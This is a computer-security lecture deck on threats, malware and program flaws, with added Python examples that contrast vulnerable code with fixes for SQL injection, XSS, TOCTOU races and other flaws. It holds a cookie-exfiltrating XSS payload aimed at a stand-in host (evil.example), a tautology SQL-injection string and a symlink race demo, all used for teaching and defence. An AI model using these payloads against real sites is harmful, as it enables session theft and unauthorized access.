CH2 CS Lecture


Admas University

Department of Computer Science

Chapter 2 – Computer Threats

By: Getaneh T.
Computer Threats
 Computer threats refer to various
malicious activities and risks that can
compromise the security and integrity of
computer systems, networks, and data.
Computer Security

 Key objectives:
 confidentiality
 integrity
 availability
Confidentiality
 the term covers two related concepts:
 Data
• assures that private or confidential information is
not made available or disclosed to unauthorized
individuals

 Privacy
• assures that individuals control or influence what
information related to them may be collected and
stored and by whom and to whom that information
may be disclosed
Integrity
 the term covers two related concepts:
 Data integrity
• assures that information and programs are
changed only in a specified and authorized manner
 System integrity
• assures that a system performs its intended
function in an unimpaired manner, free from
deliberate or inadvertent unauthorized
manipulation of the system
Availability
 assures that systems work promptly and service is not denied to authorized users
Loss of Security
 The loss of security in each category:
 Confidentiality
• unauthorized disclosure of information
 Integrity
• unauthorized modification or destruction of
information
 Availability
• disruption of access to or use of information or an
information system
Additional Security Objectives
 Some information security professionals feel that two more objectives need to be added:
 Authenticity
• being genuine and able to be verified and trusted
 Accountability
• actions of an entity can be traced uniquely to that entity
• supports non-repudiation: the entity cannot later deny having performed the action
Computer and Network Assets, with Examples of Threats
 Hardware
• Availability: equipment is stolen or disabled, thus denying service.
 Software
• Availability: programs are deleted, denying access to users.
• Confidentiality: an unauthorized copy of software is made.
• Integrity: a working program is modified, either to cause it to fail during execution or to cause it to do some unintended task.
 Data
• Availability: files are deleted, denying access to users.
• Confidentiality: an unauthorized read of data is performed; an analysis of statistical data reveals underlying data.
• Integrity: existing files are modified or new files are fabricated.
 Communication Lines
• Availability: messages are destroyed or deleted; communication lines or networks are rendered unavailable.
• Confidentiality: messages are read; the traffic pattern of messages is observed.
• Integrity: messages are modified, delayed, reordered, or duplicated; false messages are fabricated.
Hardware
 most vulnerable to attack
 least susceptible to automated controls
 threats
 accidental damage
 intentional damage
 theft
Software
 includes operating system, utilities and application programs
 key threats:
• easy to delete
• can be altered or damaged
• can be modified
• license can be compromised or misused

Data
 security concerns with respect to data are broad, encompassing:
 availability
 secrecy
 integrity
 major concerns with data have to do with:
• theft of files
• destruction of files
• unauthorized reading of files
• incorrect but intentional analysis of data
Communication Lines & Networks
 Network security attack classification:
 Passive
• goal of the attacker is to gather information without being noticed
• does not affect system resources
• two types: release of message contents and traffic analysis
 Active
• involves some modification of the data stream
• attempts to alter system resources or affect their operation
Classes of Intruders
 Masquerader – usually an outsider
 penetrates a legitimate user's account by pretending to be that user
 Misfeasor – usually an insider
 a legitimate user who accesses data, programs, or resources they are not authorized to access
 Clandestine User – outsider or insider
 a user who seizes supervisory control of a system in order to evade prevention, access, and detection (auditing) controls
Behavior Patterns of Intruders:
Hackers and Criminals
 Hackers
 usually high level of competence
 share their findings
 look for targets of opportunity
 Criminals
 organized groups of hackers are a common
modern threat
 typically young
 usually have specific targets
Behavior Patterns of Intruders:
Insiders
Insider Attacks
• have access to and knowledge of
internal systems and processes
• often motivated by revenge or a feeling
of entitlement
• usually been with company for a fairly
long time
• often times trusted
Intrusion Techniques
 System or Software Vulnerabilities
 Back Doors
 Buffer Overflow
 Password Compromise
 Root Kits
 Social Engineering
Class of attacks
 Attacks can be classified into various categories based on different criteria. Here are some common classifications of attacks:
 Network Attacks:
 Denial of Service (DoS) Attack
 Distributed Denial of Service (DDoS) Attack
 Man-in-the-Middle (MitM) Attack
 Packet Sniffing
 IP Spoofing
 Port Scanning
 ARP Poisoning
 Malware Attacks:
 Viruses
 Worms
 Trojans
 Ransomware
 Spyware
 Adware
 Botnets
 Social Engineering Attacks:
 Phishing
 Spear Phishing
 Whaling
 Vishing (Voice Phishing)
 Smishing (SMS Phishing)
 Pretexting
 Baiting
 Shoulder Surfing
 Web Application Attacks:
 SQL Injection
 Cross-Site Scripting (XSS)
 Cross-Site Request Forgery (CSRF)
 Clickjacking
 Remote File Inclusion (RFI)
 Local File Inclusion (LFI)
 Server-Side Request Forgery (SSRF)
 XML External Entity (XXE) Attack
 Wireless Attacks:
 Wi-Fi Eavesdropping
 Wi-Fi Password Cracking
 Evil Twin Attack
 Rogue Access Point
 Wi-Fi Deauthentication Attack
 Bluetooth Hacking
 Near Field Communication (NFC) Attacks
 Physical Attacks:
 Theft of Devices
 Tampering with Hardware
 Dumpster Diving
 Tailgating (Unauthorized Access)
 Shoulder Surfing
 Skimming (Credit Card or ATM)
 Insider Attacks:
 Insider Threats
 Unauthorized Access by Employees
 Data Theft or Leakage
 Sabotage
 Fraudulent Activities
Malicious Software
 Malware comes in many disguises:
• application programs
• utility programs (editors, compilers)
• attachments
• links
Categories of Malicious
Software
 parasitic
 fragments of programs that cannot exist
independently of some actual application
program, utility, or system program
• viruses, logic bombs, backdoors
 independent
 self-contained programs that can be
scheduled and run by the operating system
• worms, bots
Terminology of Malicious Programs
 Virus: Malware that, when executed, tries to replicate itself into other executable code; when it succeeds the code is said to be infected. When the infected code is executed, the virus also executes.
 Worm: A computer program that can run independently and can propagate a complete working version of itself onto other hosts on a network.
 Logic bomb: A program inserted into software by an intruder. A logic bomb lies dormant until a predefined condition is met; the program then triggers an unauthorized act.
 Trojan horse: A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the Trojan horse program.
 Backdoor (trapdoor): Any mechanism that bypasses a normal security check; it may allow unauthorized access to functionality.
 Mobile code: Software (e.g., script, macro, or other portable instruction) that can be shipped unchanged to a heterogeneous collection of platforms and execute with identical semantics.
 Exploits: Code specific to a single vulnerability or set of vulnerabilities.
 Downloaders: Program that installs other items on a machine that is under attack. Usually, a downloader is sent in an e-mail.
 Auto-rooter: Malicious hacker tools used to break into new machines remotely.
 Kit (virus generator): Set of tools for generating new viruses automatically.
 Spammer programs: Used to send large volumes of unwanted e-mail.
 Flooders: Used to attack networked computer systems with a large volume of traffic to carry out a denial-of-service (DoS) attack.
 Keyloggers: Captures keystrokes on a compromised system.
 Rootkit: Set of hacker tools used after the attacker has broken into a computer system and gained root-level access.
 Zombie, bot: Program activated on an infected machine that is activated to launch attacks on other machines.
 Spyware: Software that collects information from a computer and transmits it to another system.
 Adware: Advertising that is integrated into software. It can result in pop-up ads or redirection of a browser to a commercial site.
Backdoor
 trapdoor
 a secret entry point into a program that allows access without going through the normal security checks, giving unauthorized access to data or functionality
 backdoors are common among the programming community and are used for a variety of maintenance tasks (maintenance hook)
 it is important not to allow backdoors into production environments
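The last bullet is enforceable with a small source check. The following is an added example, not code from the original slides: it parses Python source and flags the classic maintenance hook, a comparison of a credential-looking variable against a string literal. The list of credential-like names, the function names and the two sample sources are assumptions made for the illustration.

```python
"""Added example: flag hard-coded credential comparisons (maintenance hooks)
in Python source before they reach production. Heuristic and sample code are
assumptions for illustration, not part of the original slides."""
import ast

# Assumed heuristic: identifiers containing these fragments hold credentials.
CREDENTIAL_NAMES = ("password", "passwd", "pwd", "secret", "token", "key")


def _is_credential_name(node: ast.AST) -> bool:
    """True if the node is a variable or attribute whose name looks like a credential."""
    if isinstance(node, ast.Name):
        name = node.id
    elif isinstance(node, ast.Attribute):
        name = node.attr
    else:
        return False
    return any(hint in name.lower() for hint in CREDENTIAL_NAMES)


def find_hardcoded_credential_checks(source: str):
    """Return (line, literal) for every `cred == "literal"` / `"literal" == cred`
    comparison in the source, including the operands of chained comparisons."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Compare):
            continue
        operands = [node.left] + list(node.comparators)
        for op, left, right in zip(node.ops, operands, operands[1:]):
            if not isinstance(op, (ast.Eq, ast.NotEq)):
                continue
            for cred, other in ((left, right), (right, left)):
                if (_is_credential_name(cred)
                        and isinstance(other, ast.Constant)
                        and isinstance(other.value, str)
                        and other.value):
                    findings.append((node.lineno, other.value))
    return findings


# Constructed sample: a login routine with a maintenance hook left in.
BACKDOORED_SOURCE = '''
def login(user, password, store):
    if password == "letmein-maint":   # maintenance hook, must not ship
        return True
    return store.verify(user, password)
'''

# Constructed sample: the same routine with the hook removed.
CLEAN_SOURCE = '''
def login(user, password, store):
    return store.verify(user, password)
'''

if __name__ == "__main__":
    print(find_hardcoded_credential_checks(BACKDOORED_SOURCE))
    print(find_hardcoded_credential_checks(CLEAN_SOURCE))
```

Run it over a tree as a pre-merge check; a hit is not proof of a backdoor, but every hit should be explained by a reviewer, and real credentials belong in a secret store, never in a comparison against a literal.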
Logic Bomb
 predates viruses and worms
 code embedded in a legitimate program that will "explode" at a given time or when certain conditions are met
 presence or absence of certain files
 particular day of the week or date
 particular user using the application
Trojan Horse
 program that contains hidden code that, when invoked, causes harm to the system or system infrastructure it was launched from
 3 models of Trojan horses are typical:
• continuing original program functions while in parallel doing the malicious activity
• continuing original program functions but modifying it to perform malicious activity
• replacing original program functions with the malicious activity
Mobile Code
 script, macro, or other portable instruction
that can be shipped unchanged to a
collection of platforms
 transmitted from a remote system to a
local system and then executed on the
local system without the user’s explicit
instruction
 mechanism for a virus, worm, or Trojan horse
 vulnerabilities such as unauthorized data
access
Viruses
 can do anything other programs can do
 attaches itself to a program and executes secretly
 once running it can perform any function allowed by the current user's rights
 has three parts:
• infection mechanism: the means by which the virus spreads, enabling it to replicate
• trigger: the event or condition that determines when the payload is delivered
• payload: what the virus does, besides spreading
Virus Lifecycle
 Dormant: the virus is idle and waiting
 Propagation: the virus places a copy of itself into other programs
 Trigger: the virus is activated to perform the function for which it was intended
 Execution: the virus function is performed
Worms
 self replicating – usually very quickly
 usually performs some unwanted function
 actively seeks out more machines to infect
 self-replicating vehicles:
• email
• remote execution
• remote login
Worms
 phases, as for a virus: dormant, propagation, trigger, execution
 in the propagation phase the worm will:
• search for other systems to infect
• establish remote connections
• copy itself to the remote system and cause the copy to run
Program flaws
 Computer threats such as malware and cyberattacks succeed by exploiting flaws (vulnerabilities) in the programs they target. Here are some common program flaws that computer threats exploit:
Buffer Overflow:
 A buffer overflow occurs when a program writes more data into a fixed-size buffer than it can hold, so the excess overwrites adjacent memory (neighbouring variables, a function pointer, or a saved return address). In C this typically comes from unbounded copies such as strcpy, gets, or sprintf into a stack or heap buffer. Attackers use the overwrite to inject code or to modify critical data, and buffer overflow vulnerabilities are often exploited by malware to execute arbitrary code or gain unauthorized access.
Injection Attacks:
 Injection attacks exploit vulnerabilities in
programs that do not properly validate or
sanitize user input. For example, SQL
injection attacks occur when an attacker
inserts malicious SQL queries into user input
fields, tricking the program into executing
unintended database operations. Similarly,
command injection attacks occur when an
attacker injects malicious commands into
user input fields, allowing them to execute
arbitrary commands on the targeted system.
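The SQL injection case above, as an added example (not code from the slides): a login check against an in-memory SQLite table, first with the query built by string formatting, then with the data passed as parameters. The schema, the one user row and the payload are constructed for the demonstration.

```python
"""Added example: SQL injection against SQLite, vulnerable query beside the
parameterized fix. Schema, data and payload are constructed for illustration."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Throwaway in-memory users table with one constructed row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    return con


def login_vulnerable(con: sqlite3.Connection, name: str, password: str) -> bool:
    """User input is spliced into the SQL text, so it can change the query's meaning."""
    query = "SELECT 1 FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    return con.execute(query).fetchone() is not None


def login_parameterized(con: sqlite3.Connection, name: str, password: str) -> bool:
    """Query text and data travel separately: the driver binds the values, so a quote
    in the input is just a quote. (The same principle applies to OS commands: pass
    arguments as a list to subprocess instead of building a shell string.)"""
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return con.execute(query, (name, password)).fetchone() is not None


# Classic tautology payload: closes the quoted string and appends OR 'a'='a'.
# The vulnerable query becomes:
#   ... WHERE name = 'alice' AND password = '' OR 'a'='a'
# and AND binds tighter than OR, so the WHERE clause is always true.
INJECTION = "' OR 'a'='a"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, real password:  ", login_vulnerable(con, "alice", "correct horse"))
    print("vulnerable, injected:       ", login_vulnerable(con, "alice", INJECTION))
    print("parameterized, injected:    ", login_parameterized(con, "alice", INJECTION))
    print("parameterized, real password:", login_parameterized(con, "alice", "correct horse"))
```

Parameterization fixes the query; it does not excuse storing passwords in plaintext as this table does, which the authentication section addresses separately.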
Cross-Site Scripting (XSS):
 XSS vulnerabilities occur when a program
fails to properly validate and sanitize user-
provided data that is displayed on web
pages. Attackers can inject malicious
scripts into web pages, which are then
executed by unsuspecting users'
browsers. XSS attacks can lead to session
hijacking, unauthorized data access, or
distribution of malicious content.
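The defence the XSS passage implies is output encoding chosen for the context the data lands in. The following is an added example, not code from the slides: a reflected search term rendered unsafely, then rendered correctly for an HTML text node, an attribute value and a script block. The page fragments and the payload are constructed.

```python
"""Added example: a reflected-XSS sink and context-aware output encoding.
Templates and payload are constructed for illustration."""
import html
import json

# Constructed attacker-controlled input, e.g. a search term echoed back to the page.
PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'


def render_vulnerable(term: str) -> str:
    """Concatenates untrusted text straight into HTML: the browser runs the script."""
    return "<p>Results for: " + term + "</p>"


def render_text(term: str) -> str:
    """HTML text context: escaping & < > keeps markup in the data inert."""
    return "<p>Results for: " + html.escape(term) + "</p>"


def render_attribute(term: str) -> str:
    """Attribute context: the attribute must be quoted AND quotes must be escaped,
    otherwise `" onfocus="alert(1)` breaks out and adds an event handler."""
    return '<input name="q" value="' + html.escape(term, quote=True) + '">'


def render_script_data(term: str) -> str:
    """JavaScript context: serialize as JSON, then hex-escape < and > so that a
    literal </script> inside the string cannot terminate the script element."""
    encoded = json.dumps(term).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var q = " + encoded + ";</script>"


if __name__ == "__main__":
    for render in (render_vulnerable, render_text, render_attribute, render_script_data):
        print(render.__name__, "->", render(PAYLOAD))
```

Escaping belongs at the sink, not at input time: the same string may be written into three different contexts, and only the rendering code knows which one.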
Insecure Authentication and
Authorization
 Weak or flawed authentication and
authorization mechanisms can enable
unauthorized access to systems or sensitive
data. This includes the use of weak
passwords, lack of multi-factor authentication,
improper session management, and insecure
storage of user credentials. Attackers can
exploit these vulnerabilities to gain
unauthorized access to user accounts or
administrative privileges.
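Two of the weaknesses named above, insecure credential storage and poor session management, have standard-library fixes. The following is an added example, not code from the slides: salted, iterated password hashing with a constant-time comparison, and a server-side session store with CSPRNG identifiers and expiry. The iteration count and the in-memory store are assumptions for the illustration.

```python
"""Added example: password storage and session handling done the way the
passage recommends. Iteration count and store are assumptions for illustration."""
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ITERATIONS = 200_000   # assumption: raise until one hash costs ~100 ms on your hardware
DIGEST_LEN = 32


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted, iterated hash for storage: never the password, never a plain fast hash."""
    salt = salt or os.urandom(16)             # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                 PBKDF2_ITERATIONS, DIGEST_LEN)
    return "pbkdf2_sha256$%d$%s$%s" % (PBKDF2_ITERATIONS, salt.hex(), digest.hex())


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations), DIGEST_LEN)
    return hmac.compare_digest(digest.hex(), digest_hex)


class SessionStore:
    """Server-side sessions: unguessable IDs from a CSPRNG, absolute expiry, explicit logout.
    The clock is injectable so expiry can be exercised without waiting."""

    def __init__(self, ttl_seconds: int = 900, clock=time.time):
        self._sessions = {}
        self._ttl = ttl_seconds
        self._clock = clock

    def create(self, user: str) -> str:
        session_id = secrets.token_urlsafe(32)    # 256 bits of entropy, not a counter
        self._sessions[session_id] = (user, self._clock() + self._ttl)
        return session_id

    def user_for(self, session_id: str):
        """Return the user bound to the session, or None if unknown or expired."""
        entry = self._sessions.get(session_id)
        if entry is None:
            return None
        user, expires_at = entry
        if self._clock() >= expires_at:
            del self._sessions[session_id]
            return None
        return user

    def destroy(self, session_id: str) -> None:
        self._sessions.pop(session_id, None)
```

Issue a new session ID after login (call create() again rather than reusing a pre-login one) so a fixation attack cannot hand the victim an ID the attacker already knows.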
Race Conditions:
 Race conditions occur when the outcome of a program depends on the sequence or timing of events that are not properly synchronized. The security-relevant form seen most often is the time-of-check to time-of-use (TOCTOU) flaw: the program checks a resource (a file, a permission, a balance) and then uses it, and the resource changes between the two steps. Attackers exploit race conditions to manipulate the intended behavior of a program, such as gaining unauthorized access to resources or executing unauthorized operations.
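The TOCTOU case on a file path, as an added example that is not part of the original slides: a reader that checks a path and then opens the same path, beside one that opens first and validates the descriptor it actually got. The directory layout is constructed in a temporary directory, and the race is simulated by a hook that runs inside the check-then-use window; the example assumes a POSIX system with O_NOFOLLOW.

```python
"""Added example: time-of-check/time-of-use on a file path and its fix.
Fixture directory and the simulated race are constructed for illustration."""
import os
import shutil
import stat
import tempfile


def read_report_vulnerable(path: str, race=lambda: None) -> str:
    """Check-then-use: the checks and the open() each look the name up separately,
    so whatever replaces the name between the two calls is what gets read."""
    if os.path.islink(path) or not os.path.isfile(path):
        raise PermissionError("not a regular file")
    race()                           # stands in for the attacker winning the race
    with open(path, "r") as f:       # second lookup of the same name
        return f.read()


def read_report_safe(path: str) -> str:
    """Open first, refusing to follow a symlink, then validate with fstat: the checks
    apply to the object that is actually read, so there is no window to exploit."""
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0) | getattr(os, "O_CLOEXEC", 0)
    fd = os.open(path, flags)
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError("not a regular file")
    except BaseException:
        os.close(fd)
        raise
    with os.fdopen(fd, "r") as f:    # fdopen now owns fd and closes it
        return f.read()


def build_layout():
    """Constructed fixture: a public report and a secret file in a fresh temp dir."""
    d = tempfile.mkdtemp()
    report, secret = os.path.join(d, "report.txt"), os.path.join(d, "secret.txt")
    with open(report, "w") as f:
        f.write("public report\n")
    with open(secret, "w") as f:
        f.write("TOP SECRET\n")
    return d, report, secret


def swap_for_symlink(path: str, target: str) -> None:
    """What the attacker does inside the window: re-point the name at the secret."""
    os.remove(path)
    os.symlink(target, path)


def run_demo():
    """Return (honest read, what the racy reader leaks, what the safe reader does)."""
    d, report, secret = build_layout()
    try:
        honest = read_report_safe(report)
        leaked = read_report_vulnerable(report, race=lambda: swap_for_symlink(report, secret))
        try:
            safe = read_report_safe(report)   # the name is a symlink now
        except OSError as exc:
            safe = "refused: " + type(exc).__name__
        return honest, leaked, safe
    finally:
        shutil.rmtree(d)


if __name__ == "__main__":
    print(run_demo())
```

The general rule: decide on the object, not on the name. Where a name must be checked, do it with directory-relative calls (openat-style) on a directory descriptor the attacker cannot rewrite, and drop privileges before touching user-controlled paths.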
Lack of Input Validation:
 Programs that do not validate and sanitize
user input are susceptible to various
attacks, including code injection, cross-site
scripting, and command injection. Failure
to validate input allows attackers to
provide malicious input that can bypass
security measures and exploit
vulnerabilities.
Incomplete mediation
 Incomplete mediation refers to a security
vulnerability that occurs when a system fails
to properly validate and enforce access
controls for all relevant actions or resources.
It arises when a system does not
consistently enforce security checks and
relies on assumptions about the behavior of
higher-level systems or components.
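The following is an added example, not code from the slides, of what incomplete mediation looks like in an application: an order handler that trusts a price field the client sent (the check happened in the browser, which the server assumes was honest), beside one that re-derives every security-relevant value from server-side state. Catalog, request shape and limits are constructed.

```python
"""Added example: incomplete mediation in an order endpoint and the mediated
version. Catalog, requests and limits are constructed for illustration."""

CATALOG = {"sku-1001": 49.00, "sku-2002": 199.00}   # server-side source of truth
MAX_QTY = 10                                         # assumed business limit


def place_order_unmediated(request: dict) -> dict:
    """Relies on the client having validated price and quantity in the form."""
    total = request["price"] * request["qty"]
    return {"sku": request["sku"], "qty": request["qty"], "charged": round(total, 2)}


def place_order_mediated(request: dict) -> dict:
    """Every field is checked here, against server state, regardless of what the
    client did. The client-supplied price is not even consulted."""
    sku = request.get("sku")
    if sku not in CATALOG:
        raise ValueError("unknown sku")
    qty = request.get("qty")
    if isinstance(qty, bool) or not isinstance(qty, int) or not 1 <= qty <= MAX_QTY:
        raise ValueError("quantity out of range")
    return {"sku": sku, "qty": qty, "charged": round(CATALOG[sku] * qty, 2)}


# Constructed tampered requests: hidden price field edited, then a negative quantity
# that would turn a charge into a refund.
TAMPERED_PRICE = {"sku": "sku-2002", "qty": 1, "price": 0.01}
NEGATIVE_QTY = {"sku": "sku-2002", "qty": -3, "price": 199.00}

if __name__ == "__main__":
    print(place_order_unmediated(TAMPERED_PRICE))
    print(place_order_mediated(TAMPERED_PRICE))
```

Complete mediation means this check runs on every path that can reach the charge, including the "re-order", API and admin routes, not only the checkout form.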
Controls to protect against program flaws in execution
 To protect against program flaws in execution, there are several controls and practices that can be implemented. These controls aim to reduce the likelihood of program flaws and mitigate their impact. Here are some key controls to consider:
Input Validation and Sanitization

 Implement robust input validation and


sanitization techniques to ensure that user
input is properly validated and sanitized
before being processed by the program.
This helps prevent common vulnerabilities
such as buffer overflows, injection attacks,
and cross-site scripting.
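This control, and the "Lack of Input Validation" flaw it answers, is best done as an allowlist at the trust boundary. The following is an added example, not code from the slides: field validators that state what is acceptable rather than enumerate what is dangerous, plus a record validator that rejects unexpected fields. The field rules and sample inputs are assumptions for the illustration; validation complements the output-side defences (parameterized queries, output encoding) and does not replace them.

```python
"""Added example: allowlist input validation at the trust boundary.
Field rules and samples are constructed for illustration."""
import ipaddress
import re

# Assumed rules: say what IS acceptable. fullmatch() is used so the pattern
# must cover the whole value; ASCII classes reject look-alike Unicode letters.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,31}")
HOST_LABEL_RE = re.compile(r"(?!-)[a-z0-9-]{1,63}(?<!-)")


def validate_username(value) -> str:
    """3-32 chars: ASCII lowercase letter first, then letters, digits or underscore."""
    if not isinstance(value, str) or not USERNAME_RE.fullmatch(value):
        raise ValueError("username")
    return value


def validate_host(value) -> str:
    """An IP literal, or a DNS name made only of valid labels; returned normalized."""
    if not isinstance(value, str) or not value or len(value) > 253:
        raise ValueError("host")
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    labels = value.lower().split(".")
    if not all(HOST_LABEL_RE.fullmatch(label) for label in labels):
        raise ValueError("host")
    return value.lower()


def validate_port(value) -> int:
    """A real int (bool is excluded, since True == 1) in the TCP/UDP range."""
    if isinstance(value, bool) or not isinstance(value, int) or not 1 <= value <= 65535:
        raise ValueError("port")
    return value


RULES = {"username": validate_username, "host": validate_host, "port": validate_port}


def validate_record(raw: dict) -> dict:
    """Validate a whole request: every field required, no unknown fields tolerated
    (an extra "role": "admin" must not be passed through to the model)."""
    if set(raw) != set(RULES):
        raise ValueError("unexpected or missing fields: %s" % sorted(set(raw) ^ set(RULES)))
    return {name: RULES[name](raw[name]) for name in RULES}


if __name__ == "__main__":
    print(validate_record({"username": "alice", "host": "DB.internal.example", "port": 5432}))
```

Validate type, length, format and range, in that order, and keep the validated copy rather than the raw input for everything downstream.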
Secure Coding Practices:
 Follow secure coding practices, such as
avoiding the use of unsafe functions,
ensuring proper memory management,
and utilizing secure coding libraries and
frameworks. Adhering to coding standards
and best practices helps minimize
program flaws and vulnerabilities.
Memory Protection Mechanisms
 Utilize memory protection mechanisms, such as address space layout randomization (ASLR) and data execution prevention (DEP, also known as NX or W^X). These mechanisms make it more difficult for attackers to exploit memory-related vulnerabilities and execute arbitrary code; they raise the cost of exploitation rather than remove the underlying flaw, so they complement fixing the bug rather than replace it.
Access Controls:
 Implement strong access controls to
ensure that only authorized users or
processes can access sensitive resources
or perform critical operations. This
includes proper authentication,
authorization, and role-based access
control (RBAC).
Security Testing:

 Conduct regular security testing, including


vulnerability scanning, penetration testing,
and code reviews. These activities help
identify and address program flaws and
vulnerabilities before they can be
exploited.
User Education and Awareness
 Educate and raise awareness among users
about potential program flaws and safe
computing practices. Encourage users to
exercise caution when interacting with
software, avoid downloading or executing
suspicious files, and report any unusual
behaviors or errors.
Operating System Support and Administrative Controls
 Operating system support and administrative controls play a crucial role in protecting against program flaws and improving overall system security. These controls are implemented at the operating system level and focus on managing access, enforcing security policies, and ensuring the integrity and availability of the system. Key operating system support and administrative controls include:
 User Account Management
 Access Control
 Privilege Separation
Program Security Defenses
 Program security defenses are measures
and techniques used to protect software
applications from various security threats
and vulnerabilities.
 These defenses are designed to prevent,
detect, and mitigate attacks that can exploit
program flaws and compromise the
security of the software. Here are some
common program security defenses:
Cont’d
 Input Validation and Sanitization:
 Thoroughly validate and sanitize all user input to
prevent input-based vulnerabilities such as buffer
overflows, injection attacks, and cross-site scripting
(XSS). This involves checking input for length,
format, and type, and removing or encoding
potentially malicious characters.
 Secure Coding Practices:
 Follow secure coding principles and best practices
to minimize vulnerabilities. This includes avoiding
unsafe functions, properly managing memory,
validating all inputs and outputs, and using secure
coding libraries and frameworks
Cont’d
 Access Control:
 Implement strong access controls to ensure that
only authorized users or processes can access
sensitive resources or perform critical operations.
This includes proper authentication, authorization,
and role-based access control (RBAC) mechanisms.
 Secure Configuration:
 Configure the software and its environment securely,
disabling unnecessary services, using secure
defaults, and applying the principle of least privilege.
This helps reduce the attack surface and limits the
potential impact of program flaws.
Cont’d
 Encryption:
 Use encryption algorithms and protocols to protect
sensitive data at rest and in transit. This includes
encrypting passwords, sensitive configuration files,
and network communications to prevent
unauthorized access and data leakage.
 Error and Exception Handling:
 Implement robust error and exception handling
mechanisms to prevent information leakage and
crashes that can be exploited by attackers. Handle
errors gracefully, providing minimal information to
users and developers while logging detailed error
information for security monitoring.
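The error-handling guidance above, as an added example that is not code from the slides: a request handler that returns the exception text to the caller (leaking a shard name and the schema), beside one that returns a generic message with a correlation id and writes the full traceback to the log. The backend call, the log buffer and the account ids are constructed.

```python
"""Added example: error handling that keeps internals out of responses while
preserving them for monitoring. Backend and log sink are constructed."""
import io
import logging
import traceback
import uuid

# Detailed errors go here (in production: the log pipeline), never to the caller.
LOG_BUFFER = io.StringIO()
log = logging.getLogger("example.balance")
log.propagate = False
log.setLevel(logging.ERROR)
log.addHandler(logging.StreamHandler(LOG_BUFFER))


def fetch_balance(account_id: str) -> float:
    """Constructed backend call whose failure message carries internals."""
    if account_id != "acct-1":
        raise KeyError("no row in accounts for %r (shard=prod-db-01)" % account_id)
    return 42.0


def handle_balance_leaky(account_id: str):
    """Anti-pattern: the exception text, with host and schema details, goes to the client."""
    try:
        return 200, {"balance": fetch_balance(account_id)}
    except Exception as exc:
        return 500, {"error": str(exc)}


def handle_balance(account_id: str):
    """Generic message plus a correlation id outward; full traceback inward, under
    the same id so support can join the two without exposing the details."""
    try:
        return 200, {"balance": fetch_balance(account_id)}
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.error("balance request failed ref=%s\n%s", ref, traceback.format_exc())
        return 500, {"error": "internal error", "ref": ref}


if __name__ == "__main__":
    print(handle_balance_leaky("acct-9"))
    print(handle_balance("acct-9"))
    print(LOG_BUFFER.getvalue())
```

Catching every Exception at the boundary also prevents the crash; what it must not do is hide the failure, which is why the log entry carries the full traceback.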
Software development controls and
Testing techniques
 Requirements Gathering and Documentation:
 Clearly define and document the requirements of the
software application to establish a solid foundation
for development. This includes identifying functional
and non-functional requirements, as well as any
security and performance requirements.
 Secure Design Principles:
 Apply secure design principles to develop software
architectures and designs that incorporate security
controls from the ground up. Consider security
requirements, threat modeling, and risk analysis
during the design phase.
Cont’d
 Secure Coding Practices:
 Follow secure coding practices and guidelines to
minimize vulnerabilities. This includes using secure
coding libraries and frameworks, avoiding unsafe
functions, properly managing memory, validating
inputs, and implementing secure error and
exception handling.
 Code Reviews:
 Conduct code reviews to identify potential flaws,
vulnerabilities, and coding errors. Peer code
reviews can help detect issues early in the
development process and ensure adherence to
secure coding practices.
Cont’d
 Security Testing:
 Perform specialized security testing focused on
identifying and validating security controls and
mechanisms. This includes vulnerability scanning,
penetration testing, security-focused test cases, and
security-specific test frameworks.
 Integration Testing:
 Test the interaction between different components
and modules of the software application to ensure
they work together as expected. Integration testing
helps identify issues related to data flow,
communication, and interoperability.
Cont’d
 User Acceptance Testing (UAT):
 Involve end-users or stakeholders in the testing
process to validate that the software meets their
requirements and expectations. UAT helps identify
usability issues, missing functionality, and other
issues that may not have been captured in earlier
testing phases.
 Performance Testing:
 Conduct performance testing to assess the
responsiveness, scalability, and stability of the
software application under expected and peak loads.
Performance testing helps identify bottlenecks,
resource usage issues, and potential security
Database management systems
security
 Database management systems (DBMS)
security refers to the measures and practices
employed to protect the confidentiality,
integrity, and availability of data stored in a
database system. DBMS security is crucial as
databases often store sensitive and valuable
information. Here are some key aspects of
database management systems security:
Cont’d
 Access Control:
 Implement robust access control mechanisms to
ensure that only authorized users or processes can
access the database. This includes user
authentication, strong password policies, role-
based access control (RBAC), and fine-grained
access permissions at the table and column levels.
 Encryption:
 Use encryption techniques to protect data at rest
and in transit within the database system. This
includes encrypting sensitive data fields, database
backups, and network communications between
the database server and client applications.
Cont’d
 Auditing and Logging:
 Enable auditing and logging features provided by the
DBMS to track and monitor database activities. This
helps in detecting unauthorized access attempts,
identifying suspicious activities, and providing an
audit trail for forensic analysis and compliance
requirements.
 Patch Management:
 Regularly apply security patches and updates
provided by the DBMS vendor to address known
vulnerabilities. Stay informed about database security
advisories and promptly apply patches to protect
against emerging threats.
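The auditing item above, as an added example that is not part of the original slides: SQLite's statement trace hook used to build an audit trail attributed to a principal, and a small detector over that trail for the "unusual query pattern" case of one user sweeping a sensitive table row by row. The schema, the two principals, the activity and the thresholds are constructed; the hook only sees SQL text, so binding the principal to the connection is the application's job.

```python
"""Added example: database activity auditing with SQLite's trace hook and a
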